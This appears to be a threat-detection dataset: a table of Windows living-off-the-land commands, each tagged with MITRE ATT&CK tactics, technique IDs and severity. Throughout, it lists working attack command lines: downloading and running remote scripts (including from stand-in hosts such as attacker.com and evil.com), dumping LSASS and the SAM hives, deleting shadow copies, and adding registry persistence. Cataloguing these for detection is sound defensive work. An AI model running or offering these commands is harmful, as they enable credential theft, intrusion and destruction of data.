| Remote.exe /s "\\10.10.10.30\binaries\file.exe" [ANY ARGUMENTS/COMMANDS] |
63360b0051879d92a525312d |
remote |
Defense Evasion, Command and Control |
T1127, T1105 |
High |
High |
| AppVLP.exe \\webdav\calc.bat |
63360b0051879d92a525312e |
AppVLP |
Defense Evasion, Command and Control |
T1218, T1105 |
High |
High |
| AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)" |
63360b0051879d92a525312f |
AppVLP |
Defense Evasion, Execution |
T1218, T1059.001 |
High |
High |
| AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')" |
63360b0051879d92a5253130 |
AppVLP |
Defense Evasion, Execution, Command and Control |
T1218, T1059.001, T1105 |
High |
High |
| HH.exe http://some.url/script.ps1 |
63360b0051879d92a5253131 |
hh |
Command and Control, Defense Evasion |
T1105, T1218.001 |
High |
High |
| HH.exe c:\windows\system32\calc.exe |
63360b0051879d92a5253132 |
hh |
Command and Control, Defense Evasion |
T1105, T1218.001 |
High |
High |
| HH.exe C:\somefile.chm |
63360b0051879d92a5253133 |
hh |
Command and Control, Defense Evasion |
T1105, T1218.001 |
High |
High |
| Vsjitdebugger.exe calc.exe |
63360b0051879d92a5253134 |
vsjitdebugger |
Defense Evasion |
T1127 |
High |
High |
| InfDefaultInstall.exe Infdefaultinstall.inf |
63360b0051879d92a5253135 |
infdefaultinstall |
Defense Evasion |
T1218 |
High |
High |
| bcdedit /set {default} bootstatuspolicy ignoreallfailures |
63360b0051879d92a5253136 |
bcdedit |
Impact |
T1490 |
Medium |
Medium |
| bcdedit /set {default} recoveryenabled no |
63360b0051879d92a5253137 |
bcdedit |
Impact |
T1490 |
Medium |
Medium |
| bcdedit /set {default} safeboot minimal |
63360b0051879d92a5253138 |
bcdedit |
Defense Evasion |
T1562.009 |
Medium |
Medium |
| bcdedit /set {current} safeboot minimal |
63360b0051879d92a5253139 |
bcdedit |
Defense Evasion |
T1562.009 |
Medium |
Medium |
| bcdedit /set {default} safeboot network |
63360b0051879d92a525313a |
bcdedit |
Defense Evasion |
T1562.009 |
Medium |
Medium |
| bcdedit /set {current} safeboot network |
63360b0051879d92a525313b |
bcdedit |
Defense Evasion |
T1562.009 |
Medium |
Medium |
| bcdedit /set {globalsettings} advancedoptions false |
63360b0051879d92a525313c |
bcdedit |
Defense Evasion |
T1562.009 |
Medium |
Medium |
| rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo |
63360b0051879d92a525313d |
Dfsvc |
Execution |
T1127 |
High |
High |
| powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()” |
63360b0051879d92a525313e |
UtilityFunctions |
Defense Evasion |
T1216 |
High |
High |
| rpcping -s 127.0.0.1 -e 1234 -a privacy -u NTLM |
63360b0051879d92a525313f |
rpcping |
Credential Access |
T1003, T1187 |
Medium |
High |
| rpcping /s 10.0.0.35 /e 9997 /a connect /u NTLM |
63360b0051879d92a5253140 |
rpcping |
Credential Access |
T1003, T1187 |
Medium |
High |
| WorkFolders |
63360b0051879d92a5253141 |
WorkFolders |
Defense Evasion |
T1218 |
High |
High |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253142 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253143 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253144 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253145 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253146 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add HKCU\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253147 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253148 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253149 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a525314a |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a525314b |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKCU\Software\Microsoft\Active Setup\Installed Components" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a525314c |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a525314d |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a525314e |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a525314f |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253150 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253151 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253152 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253153 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253154 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253155 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253156 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253157 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\fDenyTSConnections" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253158 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\fSingleSessionPerUser" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a5253159 |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\Licensing Core\EnableConcurrentSessions" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a525315a |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\System\CurrentControlSet\Services\Ntds\Parameters" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a525315b |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a525315c |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKLM\Security\Policy\Secrets" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a525315d |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
Low |
| reg add "HKCU\Software\Classes\mscfile\shell\open\command" /v [Value] /t [REG_SZ/REG_DWORD] /d [Data] /f |
63360b0051879d92a525315e |
reg |
Defense Evasion, Persistence, Privilege Escalation |
T1112, T1547.001 |
Medium |
High |
| reg save HKLM\SECURITY c:\test\security.bak && reg save HKLM\SYSTEM c:\test\system.bak && reg save HKLM\SAM c:\test\sam.bak |
63360b0051879d92a525315f |
reg |
Credential Access |
T1003.002 |
Critical |
High |
| reg.exe ADD “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f |
63360b0051879d92a5253160 |
reg |
Defense Evasion |
T1112 |
High |
High |
| reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters /v MaxMpxCt /d 65535 /t REG_DWORD /f” |
63360b0051879d92a5253161 |
reg |
Defense Evasion |
T1112 |
High |
High |
| regasm.exe AllTheThingsx64.dll |
63360b0051879d92a5253162 |
regasm |
Defense Evasion |
T1218.009 |
High |
High |
| regasm.exe /U AllTheThingsx64.dll |
63360b0051879d92a5253163 |
regasm |
Defense Evasion |
T1218.009 |
High |
High |
| rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP" |
63360b0051879d92a5253164 |
Unregmp2 |
Defense Evasion |
T1202 |
Critical |
High |
| tttracer.exe C:\windows\system32\calc.exe |
63360b0051879d92a5253165 |
tttracer |
Defense Evasion |
T1127 |
High |
Medium |
| TTTracer.exe -dumpFull -attach pid |
63360b0051879d92a5253166 |
tttracer |
Credential Access |
T1003 |
High |
High |
| diskshadow.exe /s c:\test\diskshadow.txt |
63360b0051879d92a5253167 |
DiskShadow |
Credential Access |
T1003.003 |
High |
High |
| diskshadow exec calc.exe |
63360b0051879d92a5253168 |
DiskShadow |
Defense Evasion |
T1202 |
High |
High |
| wuauclt.exe /UpdateDeploymentProvider [TARGETDLL] /RunHandlerComServer |
63360b0051879d92a5253169 |
wuauclt |
Defense Evasion |
T1218 |
High |
High |
| vbc.exe /target:exe c:\temp\vbs\run.vb |
63360b0051879d92a525316a |
vbc |
Defense Evasion |
T1127 |
Medium |
Medium |
| start ms-appinstaller://?source=https://evil.com/raw/payload |
63360b0051879d92a525316b |
appinstaller |
Command and Control |
T1105 |
Medium |
Low |
| rundll32.exe AllTheThingsx64,EntryPoint |
63360b0051879d92a525316c |
rundll32 |
Defense Evasion |
T1218.011 |
High |
High |
| rundll32.exe \\10.10.10.10\share\payload.dll,EntryPoint |
63360b0051879d92a525316d |
rundll32 |
Defense Evasion, Command and Control |
T1218.011, T1105 |
High |
High |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');" |
63360b0051879d92a525316e |
rundll32 |
Defense Evasion, Command and Control |
T1218.011, T1105 |
High |
High |
| rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test") |
63360b0051879d92a525316f |
rundll32 |
Defense Evasion, Command and Control |
T1218.011, T1105 |
High |
High |
| rundll32.exe -sta {CLSID} |
63360b0051879d92a5253170 |
rundll32 |
Defense Evasion |
T1218.011 |
High |
High |
| rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, |
63360b0051879d92a5253171 |
ieadvpack |
Defense Evasion |
T1218.011 |
High |
High |
| rundll32.exe ieadvpack.dll,RegisterOCX test.dll |
63360b0051879d92a5253172 |
ieadvpack |
Defense Evasion |
T1218.011 |
High |
High |
| rundll32.exe ieadvpack.dll,RegisterOCX calc.exe |
63360b0051879d92a5253173 |
ieadvpack |
Defense Evasion |
T1218.011 |
High |
High |
| rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" |
63360b0051879d92a5253174 |
ieadvpack |
Defense Evasion |
T1218.011 |
High |
High |
| AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll |
63360b0051879d92a5253175 |
AccCheckConsole |
Defense Evasion |
T1218 |
High |
High |
| certutil -urlcache -f [URL] [DestinationPath] |
63360b0051879d92a5253176 |
certutil |
Command and Control |
T1105 |
Medium |
High |
| certutil -urlcache -split -f [URL] [DestinationPath] |
63360b0051879d92a5253177 |
certutil |
Command and Control |
T1105 |
Medium |
High |
| certutil -verifyctl -split -f [URL] |
63360b0051879d92a5253178 |
certutil |
Command and Control |
T1105 |
Medium |
High |
| certutil -addstore -f -user [certificatestorename] [file] |
63360b0051879d92a5253179 |
certutil |
Defense Evasion |
T1553.004 |
High |
High |
| certutil -decode -f [EncodedFile] [DestinationPath] |
63360b0051879d92a525317a |
certutil |
Defense Evasion |
T1140 |
High |
High |
| certutil -encode [Input] [Output] |
63360b0051879d92a525317b |
certutil |
Defense Evasion |
T1140 |
High |
High |
| certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt |
63360b0051879d92a525317c |
certutil |
Defense Evasion |
T1140, T1564.004 |
Medium |
High |
| dsquery subnet -limit 0 |
63360b0051879d92a525317d |
dsquery |
Discovery |
T1016 |
Low |
Medium |
| dsquery computer -limit 0 |
63360b0051879d92a525317e |
dsquery |
Discovery |
T1018 |
Low |
Medium |
| dsquery user -limit 0 |
63360b0051879d92a525317f |
dsquery |
Discovery |
T1087.002 |
Low |
Medium |
| dsquery group -limit 0 |
63360b0051879d92a5253180 |
dsquery |
Discovery |
T1069.002 |
Low |
Medium |
| dsquery * -filter "(objectClass=trustedDomain)" -attr * |
63360b0051879d92a5253181 |
dsquery |
Discovery |
T1482 |
Low |
Medium |
| dsquery group -name "Domain Admins" |
63360b0051879d92a5253182 |
dsquery |
Discovery |
T1069.002 |
Low |
Medium |
| rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" |
63360b0051879d92a5253183 |
mshtml |
Defense Evasion |
T1218.011 |
High |
High |
| DefaultPack.exe /C:"process.exe args" |
63360b0051879d92a5253184 |
DefaultPack |
Defense Evasion |
T1218 |
High |
High |
| regedit /e [OutputPath] [RegPath] |
63360b0151879d92a5253185 |
regedit |
Discovery |
T1012 |
High |
High |
| regedit /s [Path to .REG file] |
63360b0151879d92a5253186 |
regedit |
Defense Evasion |
T1112 |
High |
High |
| sqldumper.exe [PID] 0 0x0110 |
63360b0151879d92a5253187 |
sqldumper |
Credential Access |
T1003 |
High |
High |
| sqldumper.exe [LSASS_PID] 0 0x01100:40 |
63360b0151879d92a5253188 |
sqldumper |
Credential Access |
T1003, T1003.001 |
High |
High |
| TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "C:/Windows/System32/calc.exe" |
63360b0151879d92a5253189 |
ttdinject |
Defense Evasion |
T1127 |
High |
Medium |
| print /D:C:\ADS\File.txt:file.exe C:\ADS\File.exe |
63360b0151879d92a525318a |
print |
Defense Evasion |
T1564.004 |
High |
High |
| print /D:C:\OutFolder\outfile.exe \\WebDavServer\Folder\File.exe |
63360b0151879d92a525318b |
print |
Defense Evasion, Command and Control |
T1564.004, T1105 |
High |
High |
| tasklist [/s <computer> [/u [<domain>\]<username> [/p <password>]]] [{/m <module> | /svc | /v}] [/fo {table | list | csv}] [/nh] [/fi <filter> [/fi <filter> [ ... ]]] |
63360b0151879d92a525318c |
tasklist |
Discovery |
T1057, T1518.001, T1007 |
Low |
Low |
| replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A |
63360b0151879d92a525318d |
replace |
Command and Control |
T1105 |
Low |
Low |
| bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 |
63360b0151879d92a525318e |
BITSAdmin |
Defense Evasion, Command and Control |
T1218, T1564.004, T1105 |
High |
High |
| bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 |
63360b0151879d92a525318f |
BITSAdmin |
Defense Evasion, Command and Control |
T1218, T1564.004, T1105 |
High |
High |
| bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset |
63360b0151879d92a5253190 |
BITSAdmin |
Defense Evasion, Command and Control |
T1218, T1564.004, T1105 |
High |
High |
| rundll32.exe pcwutl.dll,LaunchApplication calc.exe |
63360b0151879d92a5253191 |
pcwutl |
Defense Evasion |
T1218.011 |
High |
High |
| whoami /all |
63360b0151879d92a5253192 |
whoami |
Discovery |
T1033, T1059.003 |
Low |
Medium |
| echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt |
63360b0151879d92a5253193 |
ftp |
Defense Evasion |
T1202 |
High |
High |
| cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v" |
63360b0151879d92a5253194 |
ftp |
Defense Evasion, Command and Control |
T1202, T1105 |
High |
High |
| Runonce.exe /AlternateShellStartup |
63360b0151879d92a5253195 |
runonce |
Defense Evasion |
T1218 |
High |
High |
| devtoolslauncher.exe LaunchForDeploy [PATH_TO_BIN] "argument here" test |
63360b0151879d92a5253196 |
devtoolslauncher |
Defense Evasion |
T1127 |
Medium |
High |
| rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" |
63360b0151879d92a5253197 |
ieframe |
Command and Control, Defense Evasion |
T1105, T1218.011 |
High |
High |
| InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll |
63360b0151879d92a5253198 |
InstallUtil |
Defense Evasion |
T1218.004 |
High |
High |
| control.exe c:\windows\tasks\file.txt:evil.dll |
63360b0151879d92a5253199 |
Control |
Defense Evasion |
T1564.004, T1218.002 |
High |
High |
| rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf |
63360b0151879d92a525319a |
syssetup |
Defense Evasion |
T1218.011 |
High |
High |
| rundll32.exe url.dll,OpenURL "C:\test\calc.hta" |
63360b0151879d92a525319b |
url |
Defense Evasion |
T1218.011 |
High |
High |
| rundll32.exe url.dll,OpenURL file://^C^:^/^W^i^n^d^o^w^s^/^s^y^s^t^e^m^3^2^/^c^a^l^c^.^e^x^e |
63360b0151879d92a525319c |
url |
Defense Evasion |
T1218.011, T1027 |
High |
High |
| rundll32.exe url.dll,FileProtocolHandler calc.exe |
63360b0151879d92a525319d |
url |
Defense Evasion |
T1218.011 |
High |
High |
| vssadmin delete shadows /all /quiet |
63360b0151879d92a525319e |
vssadmin |
Impact |
T1490 |
Critical |
High |
| vssadmin.exe create shadow /for=#{drive_letter} |
63360b0151879d92a525319f |
vssadmin |
Credential Access |
T1003.003 |
Critical |
High |
| “C:\Windows\System32\cmd.exe” /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no |
63360b0151879d92a52531a0 |
vssadmin |
Impact |
T1490 |
Critical |
High |
| ConfigSecurityPolicy.exe C:\\Windows\\System32\\calc.exe https://webhook.site/xxxxxxxxx?encodedfile |
63360b0151879d92a52531a1 |
ConfigSecurityPolicy |
Exfiltration |
T1567 |
High |
High |
| GfxDownloadWrapper.exe [URL] [FILE] |
63360b0151879d92a52531a2 |
gfxdownloadwrapper |
Command and Control |
T1105 |
High |
High |
| jsc.exe scriptfile.js |
63360b0151879d92a52531a3 |
jsc |
Defense Evasion |
T1127 |
High |
High |
| jsc.exe /t:library Library.js |
63360b0151879d92a52531a4 |
jsc |
Defense Evasion |
T1127 |
High |
High |
| makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab |
63360b0151879d92a52531a5 |
makecab |
Defense Evasion, Collection |
T1564.004, T1560.001 |
High |
High |
| makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab |
63360b0151879d92a52531a6 |
makecab |
Defense Evasion, Collection, Command and Control |
T1564.004, T1560.001, T1105 |
High |
High |
| at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe |
63360b0151879d92a52531a7 |
at |
Execution, Persistence, Privilege Escalation |
T1053.002 |
Medium |
Medium |
| wmic os get /format:https://[PAYLOAD] |
63360b0151879d92a52531a8 |
wmic |
Defense Evasion, Command and Control, Execution |
T1218, T1105, T1047 |
High |
Medium |
| wmic.exe process call create "c:\ads\file.txt:program.exe" |
63360b0151879d92a52531a9 |
wmic |
Defense Evasion, Execution |
T1564.004, T1218, T1047 |
High |
High |
| wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" |
63360b0151879d92a52531aa |
wmic |
Persistence, Privilege Escalation, Defense Evasion, Execution |
T1546.012, T1218, T1047 |
High |
High |
| wmic.exe /node:"10.10.10.10" process call create "evil.exe" |
63360b0151879d92a52531ab |
wmic |
Defense Evasion, Execution |
T1218, T1047 |
High |
High |
| wmic.exe /node:[COMPUTER] PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt" |
63360b0151879d92a52531ac |
wmic |
Defense Evasion, Execution |
T1218, T1047 |
High |
High |
| wmic.exe /node:[COMPUTER] PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit" |
63360b0151879d92a52531ad |
wmic |
Credential Access, Defense Evasion, Execution |
T1003.003, T1218, T1047 |
High |
High |
| wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl" |
63360b0151879d92a52531ae |
wmic |
Defense Evasion, Execution |
T1218, T1047 |
High |
High |
| wmic computersystem get name |
63360b0151879d92a52531af |
wmic |
Defense Evasion, Discovery |
T1218, T1082 |
Low |
Low |
| wmic /node:“[TARGET]” process call create “powershell Enable-PSRemoting -Force -SkipNetworkProfileCheck” |
63360b0151879d92a52531b0 |
wmic |
Defense Evasion, Execution |
T1218, T1047, T1569.002 |
High |
High |
| mmc.exe -Embedding c:\path\to\test.msc |
63360b0151879d92a52531b1 |
mmc |
Defense Evasion |
T1218.014 |
High |
High |
| mmc.exe gpedit.msc |
63360b0151879d92a52531b2 |
mmc |
Defense Evasion |
T1218.014 |
Medium |
High |
| SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" |
63360b0151879d92a52531b3 |
SyncAppvPublishingServer |
Defense Evasion, Command and Control |
T1218, T1105 |
Critical |
High |
| SQLToolsPS.exe -noprofile -command Start-Process [ANYTHING.exe] |
63360b0151879d92a52531b4 |
SQLToolsPS |
Defense Evasion |
T1218 |
High |
High |
| rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" |
63360b0151879d92a52531b5 |
comsvcs |
Defense Evasion, Credential Access |
T1218.011, T1003.001 |
High |
High |
| C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full |
63360b0151879d92a52531b6 |
comsvcs |
Defense Evasion, Credential Access |
T1218.011, T1003.001 |
High |
High |
| Presentationhost.exe C:\temp\Evil.xbap |
63360b0151879d92a52531b7 |
Presentationhost |
Defense Evasion |
T1218 |
High |
High |
| fsianycpu.exe c:\path\to\test.fsscript |
63360b0151879d92a52531b8 |
fsianycpu |
Execution, Defense Evasion |
T1059, T1218 |
High |
High |
| expand \\webdav\folder\file.bat c:\ADS\file.bat |
63360b0151879d92a52531b9 |
expand |
Command and Control |
T1105 |
Medium |
High |
| expand c:\ADS\file1.bat c:\ADS\file2.bat |
63360b0151879d92a52531ba |
expand |
Command and Control |
T1105 |
Medium |
High |
| expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat |
63360b0151879d92a52531bb |
expand |
Command and Control, Defense Evasion |
T1105, T1564.004 |
High |
High |
| Pcwrun.exe c:\temp\beacon.exe |
63360b0151879d92a52531bc |
pcwrun |
Defense Evasion |
T1218 |
High |
High |
| msiexec /quiet /i cmd.msi |
63360b0151879d92a52531bd |
msiexec |
Defense Evasion |
T1218.007 |
Low |
Low |
| msiexec /q /i http://192.168.100.3/tmp/cmd.png |
63360b0151879d92a52531be |
msiexec |
Defense Evasion |
T1218.007 |
High |
High |
| msiexec /y "C:\folder\evil.dll" |
63360b0151879d92a52531bf |
msiexec |
Defense Evasion |
T1218.007 |
High |
High |
| SettingSyncHost -LoadAndRunDiagScript anything |
63360b0151879d92a52531c0 |
SettingSyncHost |
Defense Evasion |
T1218 |
High |
High |
| nltest /domain_trusts |
63360b0151879d92a52531c1 |
nltest |
Discovery |
T1482 |
Medium |
High |
| nltest /dclist:"[DOMAIN NAME]" |
63360b0151879d92a52531c2 |
nltest |
Discovery |
T1018 |
Medium |
High |
| nltest /dsgetdc:"[DOMAIN NAME]" |
63360b0151879d92a52531c3 |
nltest |
Discovery |
T1018 |
Medium |
High |
| coregen.exe /L C:\folder\evil.dll dummy_assembly_name |
63360b0151879d92a52531c4 |
coregen |
Defense Evasion, Privilege Escalation |
T1055, T1218 |
High |
High |
| coregen.exe dummy_assembly_name |
63360b0151879d92a52531c5 |
coregen |
Defense Evasion, Privilege Escalation |
T1055, T1218 |
High |
High |
| Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" |
63360b0151879d92a52531c6 |
mavinject |
Defense Evasion |
T1564.004, T1218.013 |
High |
High |
| xwizard RunWizard /t /u {00000001-0000-0000-0000-0000FEEDACDC} |
63360b0151879d92a52531c7 |
xwizard |
Defense Evasion, Privilege Escalation, Persistence |
T1218, T1546.015 |
High |
High |
| xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z https://pastebin.com/raw/iLxUT5gM |
63360b0151879d92a52531c8 |
xwizard |
Defense Evasion, Command and Control |
T1218, T1105 |
High |
High |
| VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "[ARGUMENTS]" |
63360b0151879d92a52531c9 |
VSIISExeLauncher |
Defense Evasion |
